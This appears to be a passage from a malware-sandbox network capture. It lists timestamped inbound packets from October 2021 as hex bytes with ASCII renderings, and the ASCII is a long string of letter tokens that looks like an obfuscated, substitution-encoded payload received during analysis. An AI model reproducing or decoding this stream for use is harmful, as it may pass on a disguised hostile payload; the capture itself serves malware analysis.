2021-10-27 01:03:26 UTC	999	IN	Data Raw: 68 20 65 78 20 71 65 77 20 63 63 20 70 78 20 71 71 49 20 71 68 6a 20 71 71 71 20 70 70 20 65 68 78 20 78 70 20 63 68 20 49 68 20 71 65 68 20 71 65 63 20 4f 78 20 71 68 77 20 71 65 78 20 65 63 20 65 71 65 20 49 6a 20 65 4f 20 71 4f 68 20 71 65 6a 20 71 65 63 20 65 20 71 78 6a 20 63 68 20 78 70 20 63 49 20 6a 68 20 65 49 20 71 71 63 20 71 71 77 20 71 68 77 20 4f 70 20 78 70 20 65 78 20 65 68 78 20 63 78 20 70 78 20 71 65 68 20 70 4f 20 71 68 49 20 71 65 71 20 63 70 20 4f 63 20 65 68 63 20 63 78 20 70 78 20 71 65 68 20 71 71 63 20 71 68 68 20 6a 71 20 63 68 20 78 4f 20 63 68 20 49 68 20 63 4f 20 65 6a 71 20 71 71 49 20 71 68 4f 20 71 71 70 20 63 65 20 65 49 20 63 68 20 63 78 20 70 78 20 71 68 63 20 49 4f 20 71 68 78 20 71 71 65 20 71 4f 68 20 78 70 20 63 68 Data Ascii: h ex qew cc px qqI qhj qqq pp ehx xp ch Ih qeh qec Ox qhw qex ec eqe Ij eO qOh qej qec e qxj ch xp cI jh eI qqc qqw qhw Op xp ex ehx cx px qeh pO qhI qeq cp Oc ehc cx px qeh qqc qhh jq ch xO ch Ih cO ejq qqI qhO qqp ce eI ch cx px qhc IO qhx qqe qOh xp ch
2021-10-27 01:03:26 UTC	1000	IN	Data Raw: 77 20 6a 70 20 65 78 20 71 68 68 20 63 63 20 70 78 20 71 71 49 20 71 68 77 20 49 78 20 71 65 71 20 65 68 20 6a 70 20 65 49 20 71 77 49 20 70 78 20 71 71 78 20 71 71 63 20 77 68 20 71 71 63 20 65 68 20 65 77 20 71 4f 4f 20 65 70 20 70 78 20 71 70 68 20 71 71 20 6a 77 20 71 71 65 20 63 68 20 63 65 20 6a 49 20 4f 65 20 71 68 6a 20 71 71 63 20 4f 63 20 71 70 20 63 49 20 63 68 20 78 70 20 63 78 20 6a 68 20 70 65 20 71 71 63 20 71 71 77 20 71 68 6a 20 71 68 65 20 70 70 20 6a 20 78 65 20 6a 68 20 71 68 78 20 71 71 63 20 71 71 77 20 71 68 77 20 4f 65 20 63 63 20 65 78 20 77 78 20 63 78 20 70 78 20 71 71 49 20 4f 6a 20 70 68 20 71 71 6a 20 63 68 20 63 78 20 6a 68 20 63 71 20 71 65 78 20 71 71 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 78 20 78 70 20 63 68 20 78 63 Data Ascii: w jp ex qhh cc px qqI qhw Ix qeq eh jp eI qwI px qqx qqc wh qqc eh ew qOO ep px qph qq jw qqe ch ce jI Oe qhj qqc Oc qp cI ch xp cx jh pe qqc qqw qhj qhe pp j xe jh qhx qqc qqw qhw Oe cc ex wx cx px qqI Oj ph qqj ch cx jh cq qex qq qqw qhO qqp ex xp ch xc
2021-10-27 01:03:26 UTC	1002	IN	Data Raw: 49 20 71 71 70 20 49 78 20 78 4f 20 78 70 20 77 6a 20 63 78 20 70 78 20 71 71 78 20 63 63 20 71 68 4f 20 71 71 65 20 6a 63 20 71 49 20 71 70 4f 20 71 4f 20 71 6a 65 20 71 68 70 20 4f 6a 20 71 78 49 20 71 71 65 20 63 68 20 63 78 20 78 70 20 6a 68 20 70 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 65 20 6a 68 20 65 77 20 65 68 20 65 65 20 71 65 70 20 70 77 20 71 49 63 20 71 71 63 20 70 70 20 65 68 63 20 78 70 20 63 68 20 78 70 20 70 6a 20 4f 68 20 65 65 4f 20 71 68 4f 20 71 71 65 20 63 65 20 78 49 20 6a 71 20 78 78 20 71 71 78 20 71 65 65 20 4f 6a 20 71 6a 77 20 71 71 65 20 63 68 20 63 70 20 78 49 20 65 77 20 77 71 20 70 78 20 71 68 68 20 71 68 63 20 71 71 63 20 4f 6a 20 63 49 20 63 71 20 63 78 20 4f 78 20 4f 78 20 4f 70 20 77 68 20 71 65 65 20 63 77 20 65 Data Ascii: I qqp Ix xO xp wj cx px qqx cc qhO qqe jc qI qpO qO qje qhp Oj qxI qqe ch cx xp jh p qqx qqw qhj qhe jh ew eh ee qep pw qIc qqc pp ehc xp ch xp pj Oh eeO qhO qqe ce xI jq xx qqx qee Oj qjw qqe ch cp xI ew wq px qhh qhc qqc Oj cI cq cx Ox Ox Op wh qee cw e
2021-10-27 01:03:26 UTC	1003	IN	Data Raw: 20 71 71 20 4f 65 20 71 71 65 20 63 68 20 63 65 20 65 49 20 6a 70 20 70 63 20 71 71 78 20 71 65 77 20 49 4f 20 71 6a 6a 20 63 68 20 78 70 20 63 49 20 71 49 20 78 65 20 49 77 20 71 71 77 20 71 68 4f 20 71 71 49 20 65 49 20 71 49 71 20 63 68 20 63 78 20 70 65 20 4f 63 20 71 68 70 20 71 4f 20 49 63 20 63 68 20 78 70 20 63 78 20 6a 68 20 4f 78 20 71 71 63 20 71 71 77 20 71 68 6a 20 70 70 20 65 6a 77 20 78 70 20 63 68 20 49 68 20 78 65 20 49 77 20 71 71 77 20 71 68 4f 20 71 71 49 20 65 49 20 6a 6a 20 63 71 20 63 78 20 4f 78 20 71 65 20 71 68 6a 20 71 68 70 20 71 71 65 20 63 49 20 77 70 20 65 4f 20 63 78 20 70 78 20 71 71 70 20 4f 70 20 65 20 71 63 77 20 63 68 20 78 70 20 63 49 20 78 78 20 71 65 71 20 4f 77 20 70 6a 20 71 68 77 20 71 78 20 77 77 20 78 70 20 63 Data Ascii: qq Oe qqe ch ce eI jp pc qqx qew IO qjj ch xp cI qI xe Iw qqw qhO qqI eI qIq ch cx pe Oc qhp qO Ic ch xp cx jh Ox qqc qqw qhj pp ejw xp ch Ih xe Iw qqw qhO qqI eI jj cq cx Ox qe qhj qhp qqe cI wp eO cx px qqp Op e qcw ch xp cI xx qeq Ow pj qhw qx ww xp c
2021-10-27 01:03:26 UTC	1004	IN	Data Raw: 71 65 20 63 49 20 77 70 20 65 65 65 20 63 78 20 70 78 20 71 65 68 20 71 71 20 49 49 20 71 71 65 20 63 68 20 63 65 20 6a 77 20 70 4f 20 71 70 63 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 77 20 6a 71 20 78 68 20 65 68 20 78 70 20 78 65 20 71 6a 20 71 71 77 20 71 68 4f 20 71 71 49 20 77 49 20 68 20 63 68 20 63 78 20 70 68 20 65 4f 20 71 68 65 20 71 68 70 20 71 71 65 20 63 49 20 65 78 20 71 49 71 20 63 78 20 70 78 20 71 71 49 20 71 77 71 20 77 78 20 71 65 65 20 65 63 20 65 71 78 20 65 6a 20 6a 68 20 65 78 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 77 20 6a 71 20 78 68 20 65 68 20 78 4f 20 71 71 49 20 71 65 6a 20 70 68 20 71 70 4f 20 71 71 68 20 65 49 20 65 68 77 20 63 68 20 63 78 20 70 65 20 4f 68 20 71 4f 6a 20 71 68 4f 20 71 71 65 20 63 65 20 65 78 20 Data Ascii: qe cI wp eee cx px qeh qq II qqe ch ce jw pO qpc qqx qqw qhj qhw jq xh eh xp xe qj qqw qhO qqI wI h ch cx ph eO qhe qhp qqe cI ex qIq cx px qqI qwq wx qee ec eqx ej jh ex qqx qqw qhj qhw jq xh eh xO qqI qej ph qpO qqh eI ehw ch cx pe Oh qOj qhO qqe ce ex
2021-10-27 01:03:26 UTC	1006	IN	Data Raw: 71 71 63 20 49 4f 20 71 77 20 63 68 20 78 70 20 63 49 20 65 6a 65 20 70 78 20 71 68 68 20 4f 63 20 71 68 77 20 4f 68 20 77 49 20 68 20 63 71 20 6a 70 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 65 68 20 71 65 65 20 63 78 20 77 78 20 63 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 78 4f 20 68 20 63 49 20 63 78 20 77 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 6a 20 77 4f 20 71 71 71 20 70 70 20 71 65 78 20 70 49 20 4f 6a 20 6a 70 20 63 71 20 63 78 20 4f 78 20 49 20 63 71 20 71 68 4f 20 71 71 65 20 63 71 20 65 78 20 71 77 71 20 63 78 20 70 78 20 71 71 49 20 4f 63 20 77 63 20 4f 71 20 65 65 6a 20 78 70 20 63 68 20 63 78 20 70 77 20 49 49 20 71 65 77 20 71 68 4f 20 71 68 68 20 63 68 20 78 70 20 Data Ascii: qqc IO qw ch xp cI eje px qhh Oc qhw Oh wI h cq jp px qqx qqw qhO qqe ch qeh qee cx wx ce qqw qhO qqj xO h cI cx ww qqx qqw qhO qqe ch xp ch cj wO qqq pp qex pI Oj jp cq cx Ox I cq qhO qqe cq ex qwq cx px qqI Oc wc Oq eej xp ch cx pw II qew qhO qhh ch xp
2021-10-27 01:03:26 UTC	1007	IN	Data Raw: 77 71 20 71 68 4f 20 4f 68 20 78 4f 20 49 68 20 63 71 20 6a 70 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 70 63 20 71 70 77 20 63 78 20 70 70 20 63 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 6a 6a 20 68 20 63 78 20 63 78 20 65 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 63 77 20 63 68 20 78 70 20 6a 63 20 77 65 20 78 65 20 71 71 78 20 71 71 77 20 71 68 63 20 71 71 78 20 71 70 20 71 49 71 20 65 68 20 65 6a 68 20 77 78 20 4f 68 20 71 6a 70 20 71 68 4f 20 71 71 65 20 63 65 20 65 78 20 65 71 4f 20 63 78 20 70 78 20 71 65 68 20 4f 6a 20 71 4f 77 20 71 71 65 20 63 68 20 63 70 20 78 68 20 65 77 20 4f 63 20 70 78 20 71 71 63 20 49 4f 20 65 65 65 20 63 68 20 78 70 20 63 49 20 65 77 20 4f 63 20 70 4f 20 71 71 70 20 71 68 6a 20 4f 71 20 71 Data Ascii: wq qhO Oh xO Ih cq jp px qqx qqw qhO qqe ch qpc qpw cx pp ce qqw qhO qqj jj h cx cx ex qqx qqw qhO cw ch xp jc we xe qqx qqw qhc qqx qp qIq eh ejh wx Oh qjp qhO qqe ce ex eqO cx px qeh Oj qOw qqe ch cp xh ew Oc px qqc IO eee ch xp cI ew Oc pO qqp qhj Oq q
2021-10-27 01:03:26 UTC	1008	IN	Data Raw: 20 6a 70 20 70 78 20 71 71 78 20 71 71 4f 20 71 68 4f 20 71 68 68 20 63 68 20 71 70 4f 20 71 78 77 20 63 78 20 70 6a 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 71 20 68 20 63 78 20 63 78 20 65 78 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 63 4f 20 63 68 20 78 70 20 6a 63 20 77 65 20 6a 68 20 71 71 78 20 71 71 77 20 71 68 63 20 71 68 63 20 6a 71 20 63 77 20 65 68 20 49 65 20 71 65 78 20 65 63 71 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 63 20 63 71 20 49 65 20 65 4f 20 71 49 71 20 71 71 65 20 4f 6a 20 65 78 20 71 71 65 20 63 68 20 63 70 20 6a 68 20 63 71 20 71 6a 77 20 65 78 6a 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 71 49 20 71 71 6a 20 71 49 20 71 6a 65 20 71 68 70 20 4f 6a 20 71 78 49 20 71 71 65 20 63 68 20 63 78 20 77 49 20 77 6a 20 Data Ascii: jp px qqx qqO qhO qhh ch qpO qxw cx pj qqx qqw qhO qqe xq h cx cx exw qqx qqw qhO cO ch xp jc we jh qqx qqw qhc qhc jq cw eh Ie qex ecq qqw qhO qee ec cq Ie eO qIq qqe Oj ex qqe ch cp jh cq qjw exj qqw qhO qqe xp qI qqj qI qje qhp Oj qxI qqe ch cx wI wj
2021-10-27 01:03:26 UTC	1010	IN	Data Raw: 68 20 63 78 20 4f 78 20 71 77 65 20 71 71 70 20 71 68 65 20 4f 71 20 65 71 68 20 6a 78 20 78 70 20 6a 68 20 63 78 20 71 71 78 20 71 71 77 20 71 68 6a 20 4f 6a 20 71 63 71 20 65 6a 70 20 49 68 20 6a 49 20 70 49 20 71 78 68 20 4f 4f 20 4f 4f 20 71 71 65 20 63 68 20 78 6a 20 4f 6a 20 70 63 20 70 78 20 71 71 78 20 71 65 77 20 71 77 77 20 4f 68 20 63 68 20 78 4f 20 78 49 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 70 70 20 71 71 65 20 49 68 20 71 71 63 20 63 68 20 65 70 20 71 70 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 78 20 63 68 20 63 49 20 63 68 20 77 68 20 78 78 20 71 71 78 20 71 65 6a 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 71 20 49 20 70 68 20 71 71 78 20 65 6a 49 20 71 68 4f 20 71 71 65 20 63 68 20 71 65 63 20 63 68 20 63 78 20 49 4f 20 71 Data Ascii: h cx Ox qwe qqp qhe Oq eqh jx xp jh cx qqx qqw qhj Oj qcq ejp Ih jI pI qxh OO OO qqe ch xj Oj pc px qqx qew qww Oh ch xO xI cx px qqx qqw pp qqe Ih qqc ch ep qp qqx qqw qhp qqx ch cI ch wh xx qqx qej qhO qqe ch xp xq I ph qqx ejI qhO qqe ch qec ch cx IO q
2021-10-27 01:03:26 UTC	1014	IN	Data Raw: 71 71 78 20 71 71 63 20 6a 68 20 71 63 78 20 63 68 20 78 70 20 63 49 20 6a 68 20 71 4f 71 20 71 71 78 20 71 71 77 20 71 68 6a 20 70 49 20 65 78 20 71 77 70 20 63 68 20 63 63 20 49 70 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 71 78 20 78 70 20 65 49 20 70 65 20 70 78 20 71 71 77 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 6a 20 65 20 63 68 20 70 78 20 65 63 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 71 65 77 20 78 70 20 63 68 20 6a 4f 20 78 65 20 77 65 20 71 71 77 20 71 68 4f 20 71 71 49 20 71 71 20 77 70 20 63 68 20 63 78 20 70 78 20 71 65 20 77 4f 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71 68 70 20 63 78 20 70 78 20 71 65 68 20 4f 49 20 49 78 20 71 71 63 20 65 68 20 65 77 20 71 68 6a 20 63 70 20 71 65 77 20 71 6a 77 20 71 68 6a 20 71 Data Ascii: qqx qqc jh qcx ch xp cI jh qOq qqx qqw qhj pI ex qwp ch cc Ip qqx qqw qqq qqe qx xp eI pe px qqw qqw qhO qqe ch xj e ch px ecq qqw qhO qqe qew xp ch jO xe we qqw qhO qqI qq wp ch cx px qe wO qhO qqe cx Oc qhp cx px qeh OI Ix qqc eh ew qhj cp qew qjw qhj q
2021-10-27 01:03:26 UTC	1018	IN	Data Raw: 4f 20 71 4f 77 20 63 68 20 78 70 20 63 65 20 77 65 20 78 6a 20 71 71 78 20 71 71 77 20 71 68 6a 20 70 70 20 71 6a 63 20 78 70 20 63 68 20 78 70 20 71 65 49 20 70 78 20 4f 78 20 65 71 71 20 70 49 20 65 63 20 65 65 4f 20 65 68 20 65 4f 20 71 6a 77 20 71 71 78 20 71 71 77 20 71 65 49 20 49 78 20 78 4f 20 78 70 20 71 4f 77 20 63 78 20 70 78 20 71 71 78 20 6a 65 20 71 68 4f 20 71 71 65 20 6a 63 20 77 70 20 71 71 63 20 63 78 20 70 78 20 71 71 70 20 70 70 20 71 68 6a 20 71 78 20 71 71 78 20 78 70 20 63 68 20 63 68 20 71 68 4f 20 71 63 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 4f 63 20 65 20 63 63 20 70 78 20 71 65 68 20 71 71 68 20 49 78 20 70 65 20 65 68 20 77 4f 20 71 65 20 63 78 20 70 78 20 71 71 70 20 4f 6a 20 4f 65 20 71 71 6a 20 63 68 20 63 70 20 Data Ascii: O qOw ch xp ce we xj qqx qqw qhj pp qjc xp ch xp qeI px Ox eqq pI ec eeO eh eO qjw qqx qqw qeI Ix xO xp qOw cx px qqx je qhO qqe jc wp qqc cx px qqp pp qhj qx qqx xp ch ch qhO qcq qqw qhO qqe xp Oc e cc px qeh qqh Ix pe eh wO qe cx px qqp Oj Oe qqj ch cp
2021-10-27 01:03:26 UTC	1019	IN	Data Raw: 20 70 78 20 71 71 4f 20 71 68 77 20 6a 71 20 71 78 77 20 78 4f 20 63 68 20 78 70 20 71 65 49 20 71 65 68 20 4f 78 20 71 63 65 20 71 71 65 20 63 68 20 6a 63 20 65 20 78 70 20 70 78 20 71 68 63 20 71 71 77 20 71 68 4f 20 71 71 65 20 71 68 71 20 78 70 20 63 68 20 6a 4f 20 70 77 20 71 71 70 20 71 71 65 20 4f 4f 20 71 71 49 20 49 68 20 63 6a 20 65 49 20 65 49 20 70 63 20 71 71 78 20 71 71 63 20 71 71 49 20 4f 6a 20 63 4f 20 65 65 20 78 70 20 78 70 20 63 4f 20 65 71 71 20 71 71 49 20 71 68 4f 20 71 71 70 20 65 78 20 63 70 20 65 63 20 71 4f 63 20 70 78 20 4f 77 20 49 4f 20 71 68 77 20 71 71 65 20 63 20 78 70 20 63 68 20 63 78 20 49 77 20 71 71 78 20 71 71 77 20 71 65 78 20 71 68 68 20 6a 77 20 65 4f 20 6a 78 20 71 49 20 78 65 20 77 63 20 71 71 77 20 71 68 4f 20 Data Ascii: px qqO qhw jq qxw xO ch xp qeI qeh Ox qce qqe ch jc e xp px qhc qqw qhO qqe qhq xp ch jO pw qqp qqe OO qqI Ih cj eI eI pc qqx qqc qqI Oj cO ee xp xp cO eqq qqI qhO qqp ex cp ec qOc px Ow IO qhw qqe c xp ch cx Iw qqx qqw qex qhh jw eO jx qI xe wc qqw qhO
2021-10-27 01:03:26 UTC	1023	IN	Data Raw: 6a 20 71 68 70 20 70 70 20 71 63 20 78 4f 20 63 68 20 49 68 20 71 65 78 20 63 63 20 71 71 49 20 71 68 4f 20 71 71 70 20 4f 78 20 77 20 6a 4f 20 65 4f 20 70 6a 20 65 78 65 20 63 4f 20 71 68 4f 20 71 71 65 20 63 78 20 65 77 20 65 6a 70 20 77 65 20 65 6a 20 71 71 78 20 71 71 77 20 71 68 63 20 6a 71 20 71 78 63 20 78 4f 20 63 68 20 78 70 20 71 65 77 20 71 71 4f 20 4f 6a 20 71 65 65 20 71 71 6a 20 63 68 20 63 78 20 65 78 20 6a 77 20 71 68 68 20 71 71 6a 20 71 71 77 20 70 78 20 71 71 65 20 63 68 20 78 70 20 71 71 68 20 63 78 20 70 78 20 4f 4f 20 70 63 20 77 77 20 49 65 20 63 68 20 78 70 20 65 49 20 65 6a 65 20 70 78 20 71 71 78 20 71 65 77 20 77 77 20 71 71 6a 20 63 68 20 78 70 20 71 77 70 20 78 78 20 71 65 71 20 71 65 68 20 70 6a 20 49 4f 20 77 4f 20 63 71 20 Data Ascii: j qhp pp qc xO ch Ih qex cc qqI qhO qqp Ox w jO eO pj exe cO qhO qqe cx ew ejp we ej qqx qqw qhc jq qxc xO ch xp qew qqO Oj qee qqj ch cx ex jw qhh qqj qqw px qqe ch xp qqh cx px OO pc ww Ie ch xp eI eje px qqx qew ww qqj ch xp qwp xx qeq qeh pj IO wO cq
2021-10-27 01:03:26 UTC	1027	IN	Data Raw: 65 20 70 70 20 71 65 77 20 77 68 20 71 78 49 20 6a 6a 20 68 20 63 70 20 63 78 20 71 68 70 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 6a 20 63 68 20 78 70 20 6a 63 20 63 6a 20 70 68 20 71 71 4f 20 4f 6a 20 78 6a 20 71 71 65 20 63 68 20 63 78 20 78 68 20 65 77 20 71 71 63 20 70 78 20 71 71 20 65 6a 63 20 71 71 65 20 63 68 20 63 65 20 6a 77 20 78 49 20 77 4f 20 71 68 49 20 65 78 70 20 6a 71 20 71 71 65 20 63 68 20 78 4f 20 6a 77 20 65 77 20 77 49 20 70 78 20 71 71 78 20 71 65 6a 20 71 71 78 20 71 4f 68 20 71 65 68 20 63 68 20 63 78 20 70 63 20 65 68 70 20 71 71 78 20 71 65 65 20 71 71 70 20 71 78 78 20 63 63 20 65 49 20 71 78 65 20 70 78 20 71 71 78 20 71 71 63 20 77 71 20 71 65 65 20 65 63 20 65 6a 71 20 63 77 20 65 4f 20 71 77 70 20 71 71 6a 20 49 4f 20 71 Data Ascii: e pp qew wh qxI jj h cp cx qhp qqx qqw qhO ej ch xp jc cj ph qqO Oj xj qqe ch cx xh ew qqc px qq ejc qqe ch ce jw xI wO qhI exp jq qqe ch xO jw ew wI px qqx qej qqx qOh qeh ch cx pc ehp qqx qee qqp qxx cc eI qxe px qqx qqc wq qee ec ejq cw eO qwp qqj IO q
2021-10-27 01:03:26 UTC	1031	IN	Data Raw: 68 6a 20 6a 71 20 65 6a 20 65 68 20 65 65 20 65 71 77 20 71 78 65 20 71 4f 70 20 6a 63 20 65 65 20 70 77 20 70 49 20 70 77 20 70 68 20 63 68 20 65 6a 20 71 49 20 71 71 20 78 71 20 78 4f 20 6a 4f 20 78 49 20 65 77 20 49 63 20 70 78 20 70 63 20 71 6a 68 20 71 49 77 20 71 4f 4f 20 65 78 71 20 70 78 20 70 68 20 78 4f 20 65 6a 20 71 4f 20 71 71 20 65 71 20 70 78 20 70 63 20 71 68 49 20 70 77 20 71 65 49 20 70 78 20 4f 78 20 71 70 49 20 70 49 20 65 63 20 65 71 77 20 63 68 20 63 78 20 70 77 20 49 49 20 71 65 77 20 71 68 4f 20 4f 63 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 71 71 20 71 68 4f 20 78 6a 20 65 4f 20 71 4f 20 71 49 20 70 77 20 71 68 6a 20 4f 70 20 49 78 20 71 71 68 20 65 68 20 71 49 20 78 70 20 71 49 20 63 65 20 65 68 Data Ascii: hj jq ej eh ee eqw qxe qOp jc ee pw pI pw ph ch ej qI qq xq xO jO xI ew Ic px pc qjh qIw qOO exq px ph xO ej qO qq eq px pc qhI pw qeI px Ox qpI pI ec eqw ch cx pw II qew qhO Oc ch xp ch cx px qqx qqw qqq qhO xj eO qO qI pw qhj Op Ix qqh eh qI xp qI ce eh
2021-10-27 01:03:26 UTC	1035	IN	Data Raw: 20 71 71 4f 20 65 68 20 6a 6a 20 77 77 20 4f 63 20 49 68 20 77 63 20 71 71 70 20 6a 49 20 49 77 20 4f 77 20 63 63 20 70 78 20 71 65 68 20 4f 70 20 49 78 20 78 4f 20 65 68 20 63 78 20 6a 77 20 71 71 71 20 49 49 20 4f 78 20 77 65 20 77 63 20 71 71 4f 20 63 65 20 4f 63 20 71 65 63 20 63 63 20 70 78 20 71 65 68 20 71 65 71 20 77 77 20 71 78 49 20 71 63 70 20 6a 71 20 65 70 20 70 68 20 63 68 20 65 6a 20 71 4f 20 70 20 65 65 20 70 77 20 70 63 20 70 78 20 70 68 20 78 4f 20 70 65 20 71 68 63 20 65 68 77 20 63 6a 20 65 65 6a 20 70 49 20 70 77 20 70 68 20 78 4f 20 65 68 20 71 4f 20 70 20 65 65 20 70 77 20 70 49 20 70 77 20 70 77 20 70 4f 20 71 65 65 20 70 4f 20 71 71 4f 20 4f 71 20 6a 78 20 71 77 49 20 71 68 77 20 63 78 20 70 78 20 71 71 70 20 4f 78 20 65 65 65 20 Data Ascii: qqO eh jj ww Oc Ih wc qqp jI Iw Ow cc px qeh Op Ix xO eh cx jw qqq II Ox we wc qqO ce Oc qec cc px qeh qeq ww qxI qcp jq ep ph ch ej qO p ee pw pc px ph xO pe qhc ehw cj eej pI pw ph xO eh qO p ee pw pI pw pw pO qee pO qqO Oq jx qwI qhw cx px qqp Ox eee
2021-10-27 01:03:26 UTC	1040	IN	Data Raw: 63 68 20 63 4f 20 71 71 63 20 71 71 49 20 71 68 4f 20 71 71 70 20 6a 63 20 49 6a 20 70 70 20 70 4f 20 65 20 71 71 63 20 71 71 77 20 71 68 6a 20 71 78 20 71 68 63 20 78 70 20 63 68 20 63 68 20 71 65 68 20 71 65 49 20 71 71 20 63 78 20 71 71 65 20 63 68 20 63 65 20 6a 6a 20 6a 70 20 71 68 70 20 63 20 71 71 77 20 71 68 4f 20 71 71 65 20 77 49 20 71 68 70 20 63 68 20 63 78 20 70 68 20 71 68 6a 20 77 68 20 71 71 77 20 71 78 20 71 68 78 20 78 70 20 63 68 20 63 68 20 63 4f 20 71 71 65 20 71 71 49 20 71 68 4f 20 71 71 70 20 71 70 20 71 78 68 20 65 78 65 20 65 68 71 20 71 77 71 20 71 4f 20 71 68 68 20 4f 70 20 71 77 20 4f 68 20 6a 63 20 6a 63 20 65 4f 20 70 6a 20 71 65 20 78 71 20 71 68 4f 20 71 71 65 20 63 78 20 6a 63 20 6a 63 20 6a 4f 20 49 4f 20 4f 63 20 71 71 Data Ascii: ch cO qqc qqI qhO qqp jc Ij pp pO e qqc qqw qhj qx qhc xp ch ch qeh qeI qq cx qqe ch ce jj jp qhp c qqw qhO qqe wI qhp ch cx ph qhj wh qqw qx qhx xp ch ch cO qqe qqI qhO qqp qp qxh exe ehq qwq qO qhh Op qw Oh jc jc eO pj qe xq qhO qqe cx jc jc jO IO Oc qq
2021-10-27 01:03:26 UTC	1044	IN	Data Raw: 68 78 20 63 77 20 63 6a 20 4f 65 20 78 6a 20 71 6a 4f 20 71 68 65 20 71 71 6a 20 63 68 20 63 71 20 6a 49 20 49 20 71 6a 71 20 71 71 77 20 71 71 63 20 65 65 77 20 65 63 20 65 70 20 6a 63 20 63 6a 20 71 70 77 20 71 71 70 20 71 71 78 20 71 71 77 20 71 68 70 20 71 65 63 20 63 65 20 6a 70 20 63 4f 20 6a 65 20 70 6a 20 4f 68 20 78 6a 20 71 68 70 20 71 71 65 20 63 49 20 63 77 20 63 49 20 78 70 20 71 65 49 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 63 20 65 20 63 77 20 63 68 20 78 63 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 6a 68 20 65 71 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 71 78 20 78 63 20 6a 65 20 71 4f 71 20 71 77 20 70 78 20 71 71 78 20 71 71 4f 20 71 71 4f 20 4f 6a 20 78 4f 20 65 65 20 65 68 20 65 70 20 Data Ascii: hx cw cj Oe xj qjO qhe qqj ch cq jI I qjq qqw qqc eew ec ep jc cj qpw qqp qqx qqw qhp qec ce jp cO je pj Oh xj qhp qqe cI cw cI xp qeI qqx qqw qhO qqc e cw ch xc px qqx qqw qhO qqe ch xp xp jh eq qqx qqw qhj qqx xc je qOq qw px qqx qqO qqO Oj xO ee eh ep
2021-10-27 01:03:26 UTC	1048	IN	Data Raw: 65 68 20 63 78 20 6a 68 20 71 65 63 20 71 65 77 20 71 71 49 20 71 65 49 20 77 68 20 71 63 71 20 63 49 20 65 77 20 71 4f 4f 20 78 4f 20 71 65 78 20 65 6a 6a 20 71 71 77 20 71 68 4f 20 71 71 70 20 78 65 20 65 4f 20 63 77 20 71 49 20 4f 65 20 4f 68 20 68 20 71 68 4f 20 71 71 65 20 63 49 20 65 4f 20 63 77 20 65 4f 20 70 77 20 71 65 49 20 4f 78 20 71 63 70 20 71 65 68 20 65 49 20 6a 70 20 63 71 20 63 78 20 70 65 20 71 77 65 20 70 71 20 77 65 20 70 70 20 71 65 49 20 78 70 20 63 68 20 49 68 20 70 4f 20 71 71 77 20 4f 6a 20 65 78 71 20 71 71 65 20 63 68 20 63 78 20 63 4f 20 65 65 20 71 49 68 20 70 4f 20 71 49 63 20 71 71 63 20 70 70 20 65 68 63 20 78 70 20 63 68 20 78 70 20 71 65 78 20 71 4f 70 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 49 20 70 71 20 63 68 20 63 Data Ascii: eh cx jh qec qew qqI qeI wh qcq cI ew qOO xO qex ejj qqw qhO qqp xe eO cw qI Oe Oh h qhO qqe cI eO cw eO pw qeI Ox qcp qeh eI jp cq cx pe qwe pq we pp qeI xp ch Ih pO qqw Oj exq qqe ch cx cO ee qIh pO qIc qqc pp ehc xp ch xp qex qOp qqw qhO qqp eI pq ch c
2021-10-27 01:03:26 UTC	1051	IN	Data Raw: 20 70 4f 20 78 70 20 63 68 20 63 68 20 65 71 70 20 71 4f 77 20 65 49 20 71 63 20 71 71 6a 20 63 68 20 63 70 20 78 77 20 65 77 20 71 71 70 20 70 78 20 71 71 20 49 20 71 71 65 20 63 68 20 63 65 20 6a 63 20 63 71 20 65 68 49 20 71 71 71 20 70 70 20 71 71 4f 20 70 49 20 77 49 20 4f 65 20 63 68 20 63 78 20 70 68 20 4f 4f 20 71 71 65 20 65 78 77 20 71 65 6a 20 77 49 20 77 4f 20 63 68 20 63 78 20 4f 78 20 71 65 49 20 4f 78 20 71 68 65 20 4f 4f 20 63 78 20 65 77 20 65 63 63 20 6a 77 20 70 71 20 70 4f 20 71 77 78 20 4f 49 20 4f 71 20 65 71 78 20 77 70 20 4f 63 20 63 78 20 70 78 20 71 71 70 20 71 68 68 20 71 68 63 20 71 78 20 4f 63 20 78 70 20 63 68 20 63 68 20 65 71 70 20 71 4f 77 20 65 49 20 71 63 20 71 71 6a 20 63 68 20 63 70 20 71 49 70 20 63 70 20 4f 65 20 71 Data Ascii: pO xp ch ch eqp qOw eI qc qqj ch cp xw ew qqp px qq I qqe ch ce jc cq ehI qqq pp qqO pI wI Oe ch cx ph OO qqe exw qej wI wO ch cx Ox qeI Ox qhe OO cx ew ecc jw pq pO qwx OI Oq eqx wp Oc cx px qqp qhh qhc qx Oc xp ch ch eqp qOw eI qc qqj ch cp qIp cp Oe q
